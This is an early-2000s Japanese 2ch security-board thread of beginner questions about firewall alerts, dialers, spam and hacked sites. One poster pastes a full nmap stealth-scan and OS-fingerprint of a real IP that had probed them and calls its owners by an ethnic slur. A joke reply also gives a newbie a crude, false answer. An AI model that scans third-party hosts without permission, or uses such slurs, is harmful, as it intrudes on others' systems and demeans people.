http://www.symantec.co.jp/region/jp/campaign/wstop/images/gal-back.jpg
誰この女?

>>761
調べたんだが、どこにも掲載してねぇんだよ。

またトロイ君が来たよって
ノートン先生に言われた
IPは61.77.51.113
同じとこから4回目みたい
ここってどこなの？
こわいよー

>>763
ブロックしてるんだろうから騒ぐような問題じゃない。
ってようなことをいわれませんでしたか？

それでもこわいというなら回線切ってください。
これで確実に来なくなります。

>763
http://www.apnic.net/apnic-bin/whois.pl?search=61.77.51.113

すんませんでした
初心者で気になってしかたなかったもので

掲示板の話題といえば質問と議論だけど
この板は質問の話題ばっかりで
議論の話題は全然無いね

数ヶ月前（最強の〜等が盛えていた頃）は
それなりに　そういう話題を見かけたのに

>>767
そもそも板の参加者自体かなり減ってるような…。
だからゲスト質問者ばっかり…。
ﾊﾞﾄﾞﾄﾗﾝｽとﾆﾑﾀﾞと…、リンク踏んだ〜これｳｲﾙｽ?と…。
あとはｽﾄｰｶｰ困ってます系？ 他はﾈﾀｽﾚ…。

「最近多い質問の答えはココを読め」というスレ１個で
事足りるかもだ。

こんなメール来たんですけど、なんなんでしょう・・・

Konnichiwa,Hello,
I liked your penpal message!
My name is Daniel.Watashino namae wa Daniel desu.
I like watching movies,music,traveling. 29 years old.
I live and teach English just near Shibuya st.
Before I worked in Osaka for 1 year, but I like Tokyo much more,
it is more exciting and the accent is not so strong-just a joke...
You can see my photos from the gallery in my homepage:
http://2win.it/danielschool
Please tell me about yourself.
Looking forward meeting you!
Bye.

>>769
DMの一種だろ、英会話習いませんか？って。

From:VistaPrint< [email protected] >
To: [email protected]
Subject:Get 250 full-color business cards for free
Date:***
Received:from[209.114.218.164] by optin-global.net with ESMTP id [email protected]
From [email protected]
X-Sender: optin-global.net
Errors-To: [email protected]
Complain-To: [email protected]

You received this email because you signed up at one of Optin Global's websites or you signed up with a party that has contracted with Optin Global. To unsubscribe from our email newsletter, please visit

http://opt-out.optin-global.net/[email protected]
http://opt-out.optin-global.net/[email protected]
http://opt-out.optin-global.net/[email protected]
http://opt-out.optin-global.net/[email protected]

>>770
ホントだ（w
怖くてクリック出来なかったから確かめてなかったです
ありがとうございました。

>>771
それ、よく貼りつけてあるけど、質問してるのか、
暗にSMTP鯖を紹介しとるんか判断に困るし、正直いらつくﾖ。
晒すのが目的なら、すまんがスレたててやってくれんか？

スレ立てたらすぐ消えた。

>>774 ﾜﾛﾀ
ｼｮｳｶﾞﾅｲﾅ…ﾓ〜
ﾝｼﾞｬ出来ればsageでお願いね。。

ここって　ハッキングされてない？
http://www.sola.co.jp/

聞きたいのですが、勝手に国際回線に繋いでしまうことはあるのでしょうか？
いろいろＨＰを見ていたら勝手にインストールしたような気がしたので、ダイヤルのプロパティを見たら正しいアクセスポイントの電話番号でした。
しかし頭に８１が付いてました。
これって国際回線に繋がっているのでしょうか？
また国際回線に勝手に繋がっているかどうか確認するときどうしたらいいのでしょうか？

age

>>778
＞勝手に国際回線に繋いでしまうことはあるのでしょうか？
あるよ。ＮＴＴのＨＰに警告ソフトあるよ。
８１は日本の国際電話識別番号だから気にしなくていい。

>>780
ありがとうございます。
もし国際電話に繋がっていた場合、ダイヤルのプロパティに何らかの変化はあるのでしょうか？
例えばアクセスポイントの電話番号が書き換えられるとか。
それとも勝手に国際電話に繋がっている場合、ダイヤルのプロパティでは確認不可能ですか？

>>781
番号は変わるよ。自分で戻すとイイよ。
ってか回線一回切断されて国際電話に繋がるからすぐ分かると思う。
確認して番号変わってたら　もう遅いジャン
警告ソフト入れたほうが安心だよ。

アドバイス有難うございました。
早速警告ソフトをダウンロードしました。どうも私の早とちりだったみたいです。

あるそうです。　雑誌にあった。マイクロソフトがパッチをリリース
しなければ、記事にするとか。台湾などアジアのエロサイトによく
あるそうだ。

なぜか最近ネタスレ多いね

　

さっきインターネットコップネットってとこに繋がってしまいました。
evidence eliminatorってなんですか？

いきなりＹＯＵ　ＨＡＶＥ　Ａ　ＢＩＧ　ＰＲＯＢＬＥＭ　なんて書かれて
どうしようか迷ってます。

ノートン先生を入れた後FTPソフト使うとSokets de Trois v1で攻撃？との警告が延々と・・・
念のために全スキャンしたけど特に検出もされず（ウィルス定義は最新）。

一旦接続も切って再試行してもやはり同様みたいです。

これって何かされてるんでしょうか？（今まで気が付かなかっただけで）
それとも放置しておいても良いものなのでしょうか？

＞７８９
ｆｔｐソフトに反応してるだけ。
ｆｔｐソフトの規則を作成しては？

>>790さん
ありがとうございました。
何とかなりました。

けどこれって何なんですかね？

　

>>789
私もなりました。ちなみにソフトはFFFTPでしたが、ほかっといたら直りました。

　

http://choco.2ch.net/test/read.cgi/news/1011361670/-100

↑
これ、ネットセキュリティ板的にはどう？

Fuckingって何ですか？

>>796
チンポを草むらに出し入れする事です

>>796　ありがとうございます。今度、試してみます。
パソコンて、操作が難しいですね！

今現在のノートン先生の統計で、
ﾃﾞﾌｫﾙﾄｲﾝﾊﾞｳﾝﾄﾞNetBios Name の遮断が24回、
ﾃﾞﾌｫﾙﾄｱｳﾄﾊﾞｳﾝﾄﾞNetBios Name の許可が24回。
NetBiosってﾔｳﾞｧｲって聞いたけど、これは大丈夫なのでしょうか？

http://pc.2ch.net/test/read.cgi/sec/1011201463/l50

↑はなんで、下がる一方なのですか？
教えてください。

書き込みがないからでしょう。

すいません。HPがハッキングされてしまったんですが、
どうすればいいのでしょうか？
トップページがわけのわからないコーヒー屋の宣伝ページに
なってます。FTPで再アップしようとしてもホストに
つなげません。どなたかマジヘルプしてください。

ちなみに表示されるHPのソースは
http://www.undergroundcoffee.com/
ですなぜこれが私のHPに出てくるのでしょうか？

>>802-803
ftpもできないような状態だとしたら、サーバー管理者
（プロバイダとか）に連絡した方がいいんじゃないの？

C:\Program Files\xerox\nwwiaというフォルダができているんですけど
誰かコレ何か知ってますか？
フォルダの中は空なのに消そうとすると使用中と言われます。
googleで検索かけたらロシアのページがヒットしました。

>>805
まあ、やってみてうまくいったから書くんだけどね、
そゆときは、xeroxのサイトにいってみるわけ。
悪くすると、英語サイトでないとひっかからないかもしれんけど、
まずは日本語サイトであればラッキーね。
http://www.fujixerox.co.jp/
さいわいにもトップページに「検索」てのがあるんで、
http://www.fujixerox.co.jp/common/search/
ここで、nwwiaてのを入れてやる。
結果は当たりでかなりラッキー。
多分この先のリンクを見れば詳しい説明とか対応とかわかるはず。
http://search.fujixerox.co.jp/search97cgi/search.cgi

リアルプレイヤーを使ってるとメアドを抜かれるという話を
聞いたんですが本当ですか？
7では改善されてるのかな。

>>807
されてない。個人情報抜きの目的で製作されたリアルプレイヤーなんて使う事自体問題。

>>807
メアドなんて適当に書くべし [email protected] でいい
あとはファイアウォールでもいれてリアルプレーヤーが外向きに出す怪しいパケットをブロックしる

>806さん
ありがとう

また最近　駄スレが増えたな・・・。

周囲のスレをサルベージしようかな

　　　　

ポートをふさぐ　というのはどうやってやるの？
netstat -aやったらたくさん開いてるみたいなんだけど、
セキュリティソフトを入れないとむりなのかな？

1月１６日開通予定だったのが本日開通。
遅れた原因はNTTの工事遅れと工事ミス。

なんと、驚いたことに工事ミスで、自宅の電話はまったくの他人に家につながってしまっていた。
１１３に苦情をいって、修理してもらったら、ADSLもめでたく開通してた。

名前がばれていた！よく行くチャットで名前がばれていた！！恐ろしい。。。何でですか？？

>>815
なんか至る所でこれ見るんだけど、騒いでいるの一人か？

普通に「チャットで本名がばれる可能性があるんですか？」とか訊きゃいいのに

ﾁｬﾝｺﾛが挨拶してきたので挨拶返しときました。煮るなり焼くなりお好きにどーぞ。

Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/ )
Host (218.7.145.145) appears to be up ... good.
Initiating SYN Stealth Scan against (218.7.145.145)
Adding open port 21/tcp
Adding open port 1025/tcp
Adding open port 445/tcp
Adding open port 1026/tcp
Adding open port 25/tcp
Adding open port 135/tcp
Adding open port 139/tcp
Adding open port 80/tcp
Adding open port 443/tcp
The SYN Stealth Scan took 62 seconds to scan 1549 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
Interesting ports on (218.7.145.145):
(The 1540 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
135/tcp open loc-srv
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1026/tcp open nterm

Remote operating system guess: MS Windows2000 Professional RC1/W2K Advance Server Beta3
TCP Sequence Prediction: Class=random positive increments
Difficulty=310993 (Good luck!)
IPID Sequence Generation: Busy server or unknown class

Nmap run completed -- 1 IP address (1 host up) scanned in 68 seconds

>>818
まさか、、、80アクセスされてそんだけぶん廻したわけぢゃ。。。

そだよ。 ﾁｬﾝｺﾛだし。

>>820
（･∀･）ｲｲ!
漏れのところ、日によって80アクセスの頻度違うんだよな。。。
今日は静かだ。。

80アクセスしたやつがﾁｬﾝｺﾛかどうか調べる方法を教えてください。

>>822
whois.arin.net 北米
whois.apnic.net アジア太平洋
whois.ripe.net ヨーロッパ
に聞く。

interMute Pro 1.0のスレッドってまだ出来てないみたいだね。ユーザーが
まだいないんだろうか。

不正アクセスした奴をそのサーバー管理者に通知するにはどうすればいいんでしょうか？

>>825
ログを添えてメールじゃないの？

メールするには、ＩＰドメインサーチで調べて出てくるメアド
に送ればいいんでしょうか？

>>822
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kr
http://irms.nic.or.kr/servlet/member.view.ISPIpAddress

Mypartyていう新ウィルスに気をつけてね

☆ウィルス情報＆質問　総合スレッド☆
http://pc.2ch.net/test/read.cgi/sec/1010948022/l50

ところで皆さんは
噂のこのサイトを見ました？
http://www.yaromat.com/macos8/index.htm
なんかすごいことになってますよね？？

これって踏んだらどうなるの？？

>>830 それね、君が生まれる前からあるのよ。
HEAD /macos8/index.htm HTTP/1.0
Host: www.yaromat.com

HTTP/1.1 200 OK
Date: Mon, 04 Feb 2002 15:10:05 GMT
Server: Apache
Last-Modified: Tue, 17 Apr 2001 19:19:28 GMT
ETag: "2b09dc-13e-3adc9740"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/html

質問です
httpsのサイトで書き込んだ情報ってのは管理者にはわかりませんか？
具体的には職場でメールしたいってことなんですけど…
セキュリティ対応ってなっているんですがどうなんでしょうか？

>>832 内容はわからないがどこにつないでいたかはわかる。
しかし、SSLはCPU食うので認証時だけSSLで、その後の通信は通常のhttpじゃ無いのか?
見られて困るなら携帯のメール使え。

ありがとうございます。
携帯のメール使ってるとさぼってるのばればれですから（ｗ
その後もSSLだとすると鍵がついていたらＯＫでしょうか？

誰か教えて下さい。
私はヤフーのフリーメールを使ってメールの交換してた人がいるんですけど
その人から「あなたのＩＰアドレスこれで、使ってるプロバイダはこれだろ」
「今度個人情報ばらしてパソコンも潰してやる」って送られてきたんです。
プロバイダを教えてないのに合っていてびっくりしたんですけど
本当にそんな事ができるんですか？

友達が、　ICQで知らない外人から
「君のパソコンは覗かれている、このページを見てご覧なさい」
とアドレス付きのメッセージが来て、そのページを見てみたら
自分のパソコンのフォルダとかが一瞬表示されて
すぐに違うページに飛んだそうなんです。
これってただのたちの悪いいたずらなんですか？
それともウイルスやセキュリティを疑った方がいいのでしょうか？
ファイヤーウォール内にいたそうなんですが…。